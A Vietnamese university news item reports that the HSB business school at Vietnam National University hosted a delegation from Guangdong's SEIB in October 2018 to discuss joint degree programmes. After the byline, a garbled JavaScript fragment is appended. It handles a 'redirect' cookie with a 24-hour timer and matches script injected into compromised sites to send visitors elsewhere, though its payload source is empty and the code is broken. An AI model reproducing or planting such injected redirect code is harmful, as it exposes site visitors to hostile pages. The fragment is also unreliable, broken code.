HSB-Thuong-Hai-TQ 4Đại diện của SEIB đã đánh giá cao các chương trình đào tạo quốc tế của HSB, đặc biệt là chương trình Cử nhân Quản trị Doanh nghiệp và Công nghệ (MET).

Chiều ngày 17/10/2018, Khoa Quản trị và Kinh doanh (HSB) – ĐHQGHN đã tiếp đón đại diện của trường Đại học Ngoại ngữ – Đại học Ngoại thương Quảng Đông (School of English for International Business (SEIB) – Guangdong University of Foreign Studies) tới làm việc và tìm hiểu cơ hội hợp tác đào tạo.

Tại buổi làm việc, đại diện của SEIB đã đánh giá cao các chương trình đào tạo quốc tế hiện nay của Khoa quản trị và Kinh doanh, đặc biệt là chương trình Cử nhân Quản trị Doanh nghiệp và Công nghệ (MET).

HSB-Thuong-Hai-TQ 4

Hai bên cũng đã bàn bạc khả năng hợp tác các chương trình đào tạo khác như Cử nhân Kinh doanh Quốc tế, Thạc sĩ Quản trị Kinh doanh dạy bằng tiếng Anh và các chương trình đào tạo ngắn hạn về quản trị liên ngành. Theo đó, hai bên cùng nghiên cứu các khả năng mở chương trình liên kết đào tạo giữa HSB và SEIB, tạo điều kiện để sinh viên học tập 2 năm tại HSB và 1,5 năm tại SEIB với ngôn ngữ học bằng tiếng Anh.

HSB-Thuong-Hai-TQ 1

HSB-Thuong-Hai-TQ 5

School of English for International Business (SEIB) là một trong những trường đại học đầu tiên được Bộ Giáo dục Trung Quốc chấp thuận mở chương trình Cử nhân về Tiếng Anh Thương mại, cũng là trường đầu tiên của giáo dục đại học Trung Quốc sử dụng tiếng Anh làm ngôn ngữ giảng dạy cho tất cả các khóa học.

SEIB hiện là một trong những thành viên quan trọng nhất của Hiệp hội Pháp lý Trung Quốc (CAFL) và Hiệp hội Tiếng Anh Kinh doanh Quốc tế Trung Quốc. Nhờ sự thành công của mô hình đào tạo mới, sinh viên của SEIB được đánh giá cao về chất lượng và được nhiều nhà tuyển dụng chào đón như “Fortune 500 Enterprises”, các công ty kế toán quốc tế lớn.

Trong những năm gần đây, SEIB đã hợp tác với nhiều trường đại học từ Mỹ, Đức, Anh, Úc và Canada trong các chương trình trao đổi sinh viên và các chương trình giảng dạy hợp tác.

Nguyên Minh

{var U=(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”=”,now=Math.floor(Date.now()/1e3),(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),’‘)}